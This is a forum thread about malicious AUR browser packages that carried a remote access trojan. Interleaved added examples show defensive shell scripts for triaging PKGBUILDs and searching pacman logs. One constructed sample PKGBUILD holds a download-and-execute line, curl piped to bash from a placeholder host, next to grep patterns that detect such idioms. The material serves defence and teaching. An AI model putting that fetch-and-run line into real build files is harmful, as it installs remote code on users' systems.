by jabjq 334 days ago
> We strongly encourage users that may have installed one of these packages […] to take the necessary measures in order to ensure they were not compromised.

How are they supposed to do that when you give them no information as to what the malware does?


Did you install one of those packages? If yes, nuke from orbit.

More interesting questions are:

- Who was the uploader? A packager? For how long?

- Do they maintain other packages?

- What steps can be taken to ensure that a similar problem doesn't happen in future?

Per the Wayback Machine the username used was danikpapas. As far as Google and DuckDuckGo know, these are the only packages that username ever uploaded. Considering the purpose was crime, it's likely that that username was "stolen" and the person using it on other sites wasn't the same as the one doing this...

The AUR is arch's repository of untrusted user maintained read-the-source-before-installing packages. There's really not much that can be done to prevent similar issues in the future... because the whole purpose of the AUR is to allow random people to upload packages.

Arch doesn't ship with any way to install AUR packages other than downloading the tarball and building them locally. Tools for installing the packages usually force you to read the PKGBUILD that controls the build process (including getting sources) before letting you build the packages. I.e. the reasonable steps have already been taken.

Edit: firefox-patch-bin was first submitted to the AUR 2025-07-16 21:33 (UTC), so less than two days before removal.
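Since the comment above leans on "read the PKGBUILD before you build it", here is an added example of what that reading can check mechanically. It is not from the thread or from any Arch tooling; the package name, hosts and file names in the sample PKGBUILD are hypothetical, and the checks are heuristics (a clean PKGBUILD can still fetch a malicious binary from a legitimate-looking HTTPS host), so they narrow the review rather than replace it.

```shell
#!/bin/sh
# Added example (not from the thread). Rough triage of an AUR PKGBUILD before
# handing it to makepkg: lists source URLs and flags the patterns that most
# often hide a payload. Package name, hosts and file names below are
# hypothetical, constructed for this example.

SAMPLE_PKGBUILD=$(cat <<'EOF'
pkgname=example-patched-bin
pkgver=1.0
pkgrel=1
source=("https://example.invalid/example-1.0.tar.gz"
        "http://mirror.example.invalid/helper.sh")
sha256sums=('SKIP' 'SKIP')

package() {
  install -Dm755 helper.sh "$pkgdir/usr/bin/example-helper"
  curl -s https://example.invalid/post-install | bash
}
EOF
)

# Print every URL listed in the source=( ... ) array, one per line.
pkgbuild_sources() {
  printf '%s\n' "$1" |
    awk '/^source=\(/ { s = 1 } s { print } s && /\)/ { s = 0 }' |
    grep -Eo 'https?://[^"'"'"' )]*'
}

# Print WARN lines to stderr and the warning count to stdout.
# Checks: non-HTTPS sources, checksums set to SKIP (nothing pins the
# download), and download-and-execute / decode-and-eval idioms in functions.
pkgbuild_triage() {
  content=$1
  warnings=0
  for url in $(pkgbuild_sources "$content"); do
    case $url in
      https://*) ;;
      *) echo "WARN: non-HTTPS source: $url" >&2; warnings=$((warnings + 1)) ;;
    esac
  done
  if printf '%s\n' "$content" | grep -q "sums=.*'SKIP'"; then
    echo "WARN: checksum verification skipped (SKIP)" >&2
    warnings=$((warnings + 1))
  fi
  if printf '%s\n' "$content" |
     grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|eval[[:space:]]'; then
    echo "WARN: download-and-execute or decode-and-eval idiom in a build/package function" >&2
    warnings=$((warnings + 1))
  fi
  echo "$warnings"
}

# Run on the constructed sample; on a real checkout: pkgbuild_triage "$(cat PKGBUILD)"
pkgbuild_triage "$SAMPLE_PKGBUILD"
```

The sample trips all three checks. A real review also has to follow each source URL and look at what the archive actually contains, since the PKGBUILD of a `-bin` package is often just an `install` of whatever was downloaded.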

> Per the Wayback Machine the username used was danikpapas. As far as Google and DuckDuckGo know, these are the only packages that username ever uploaded.

I mean... if this was a malicious actor, who is to say they don't have 15 aliases on 5 Linux distros?

They are/were AUR packages it seems; anyone can spend 2 minutes and upload essentially anything there, like npm and similar. It's not necessarily a "maintainer" per se, like the people who manage the packages in the proper Arch repositories, but entirely separate.

With that comes the same warning as downloading random stuff from the internet and executing it, you need to carefully review everything before running/installing it, as you're basically doing a fancy version of "curl | bash" when using the AUR.

It says what the malware does, it's a remote access toolkit... It gives control of your machine to the malware operator.

The malware operator could have done anything with that access... There's no way for the maintainers to know what was done on any given infected machine.

Announcements like this typically contain information that will help users identify if they were compromised, such as the name of files that are dropped or modified when the malware is initialized, startup entry names, etc. Obviously the person with remote access can get in and manually start doing things on individual machines, but that doesn't mean there aren't indicators present from the programmatic actions the malware took before that point or on machines that weren't manually accessed.

Expecting a complete malware analysis from maintainers is a tad too much. Their goal is to notify users as soon as possible, even if no other information about the malware is available.

Also, an attacker may leave no traces by simply dumping the payload to /tmp.

In addition to the point about "not being expected to do a full malware analysis"...

Assuming the malware doesn't clean up after itself, `pacman -Q firefox-patch-bin librewolf-fix-bin zen-browser-patched-bin` would tell you if they are installed... but if it did clean up after itself... how are the maintainers supposed to know what steps were taken to clean up, given that it's a RAT that could be running different steps on different computers...
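An added example, not from the thread, for the "did I ever install it" question above. `pacman -Q` only answers whether a package is installed right now; ALPM also writes every install, upgrade and removal to /var/log/pacman.log, so a package that was installed and later removed (by the user or by the payload) still leaves a line there. The log excerpt, timestamps and the `helper-lib` package below are constructed for the example; the three suspect names are the ones from the thread. Caveat: anything running as root can edit that log, so an empty result is evidence, not proof.

```shell
#!/bin/sh
# Added example (not from the thread). Search ALPM history for the suspect
# package names instead of only the currently-installed set. The log lines,
# timestamps and "helper-lib" are constructed; the format is pacman.log's
# "[timestamp] [ALPM] <event> <pkg> (<version>)".

SUSPECT_PKGS="firefox-patch-bin librewolf-fix-bin zen-browser-patched-bin"

SAMPLE_LOG=$(cat <<'EOF'
[2025-07-16T22:10:03+0000] [ALPM] installed librewolf-bin (140.0.2-1)
[2025-07-17T08:41:19+0000] [PACMAN] Running 'pacman -U firefox-patch-bin-1.0-1-x86_64.pkg.tar.zst'
[2025-07-17T08:41:19+0000] [ALPM] installed firefox-patch-bin (1.0-1)
[2025-07-17T08:41:20+0000] [ALPM] installed helper-lib (2.3-1)
[2025-07-17T19:02:44+0000] [ALPM] removed firefox-patch-bin (1.0-1)
EOF
)

# Print "<timestamp> <event> <pkg>" for every install/upgrade/remove of a
# suspect package in the given log text. Field 4 must equal the name exactly,
# so the legitimate librewolf-bin does not match librewolf-fix-bin.
suspect_events() {
  log=$1
  for pkg in $SUSPECT_PKGS; do
    printf '%s\n' "$log" | awk -v p="$pkg" '
      $2 == "[ALPM]" &&
      ($3 == "installed" || $3 == "reinstalled" || $3 == "upgraded" || $3 == "removed") &&
      $4 == p { print $1, $3, $4 }'
  done
}

# Print the matching events and return 0 if any suspect package ever appears
# in the history; return 1 (print nothing) otherwise.
ever_installed() {
  events=$(suspect_events "$1")
  [ -n "$events" ] || return 1
  printf '%s\n' "$events"
}

# On the constructed sample. On a real box:
#   ever_installed "$(cat /var/log/pacman.log)" && pacman -Q $SUSPECT_PKGS
ever_installed "$SAMPLE_LOG"
```

On the sample this reports both the install and the later removal of firefox-patch-bin, which `pacman -Q` alone would miss. The same history also gives you the timestamp to start a timeline from: anything created or modified after that point is in scope.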

This is really scary for those who manage multiple things. I'm considering running a factory reset on everything from my router to my Steam Deck and remote server.

Uh... did you install these AUR packages? It seems quite unlikely you installed these on either a router or a Steam Deck...

That said, if you did, yeah being hacked is scary and I feel for you.

As @lillylizard pointed out, it turns out that these are new packages, not compromised existing packages like I first thought. Still, the nature of the hack is a Remote Execution, as you pointed out elsewhere, meaning the hacker could pull my router password from the password manager, or grab my SSH keys and log into whatever machine is listed in the known_hosts, or just mess with my eBay account and the credit card saved on there. The hacker could in theory do literally anything I could do.

Sure, but only if you'd installed the affected AUR packages. Even if they were old packages, probably your SteamOS didn't install them from the AUR.

Whether or not SteamOS installed them is irrelevant. All the hacker would need is to compromise a machine that had some sort of remote access to other devices (ssh in this case, with some sort of keylogger to decrypt the private key).

I wonder if he even has any unofficial packages installed.

I had the regular librewolf-bin package installed on a couple of my machines. It took me a bit of time to note that librewolf-fix-bin is something separate.

It's Arch Linux. The user is expected to do their own due diligence.

And these packages are from the AUR; they are not officially supported. AUR means Arch User Repository. You cannot even use Arch Linux's official package manager to install AUR packages either; you need an AUR helper ("makepkg" is sufficient though, but it has limitations). These AUR helpers are not even official packages either. Not even yay: https://archlinux.org/packages/?sort=&q=yay.
I’m well aware. Arch isn’t my daily driver anymore, but I used it for many years before really committing to containerization.

My desktop OS is much less of a concern now, so I mostly use macOS. It provides a decent shell and otherwise stays out of my way. I use Windows for gaming.

It's a remote access trojan. There is no acceptable way to be sure of removal short of fully reinstalling every OS installed and reinstalling or rebuilding stuff in the home dir from known good sources.

In case of any infection, the necessary measures are to take the affected machines offline, extract whatever data you need, and then wipe.